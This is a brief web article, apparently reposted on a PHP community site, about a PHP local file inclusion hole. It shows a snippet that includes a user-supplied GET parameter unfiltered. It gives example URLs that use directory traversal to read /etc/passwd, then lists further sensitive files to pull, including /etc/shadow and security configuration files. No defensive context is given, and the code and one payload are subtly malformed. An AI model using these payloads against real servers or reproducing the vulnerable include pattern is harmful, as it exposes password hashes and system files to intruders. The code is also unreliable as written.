Rumah  >  Artikel  >  pembangunan bahagian belakang  >  php 伪造本地文件包含漏洞的代码

php 伪造本地文件包含漏洞的代码

高洛峰
高洛峰asal
2016-11-30 13:17:231232semak imbas

代码如下: 
$page=$_GET['page'];
include($page.'php');
?> 

你可以这样使用 
http://www.xxx.com/index.php?page=../etc/passwd 
http://www.xxx.com/index.php?page=../../../etc/passwd 
http://www.xxx.com/index.php?page=..../../etc/passwd 

获取更多数据: 
etc/profile 
etc/services 
/etc/passwd 
/etc/shadow 
/etc/group 
/etc/security/group 
/etc/security/passwd 
/etc/security/user 
/etc/security/environ 
/etc/security/limits 
/usr/lib/security/mkuser.default 

Kenyataan:
Kandungan artikel ini disumbangkan secara sukarela oleh netizen, dan hak cipta adalah milik pengarang asal. Laman web ini tidak memikul tanggungjawab undang-undang yang sepadan. Jika anda menemui sebarang kandungan yang disyaki plagiarisme atau pelanggaran, sila hubungi admin@php.cn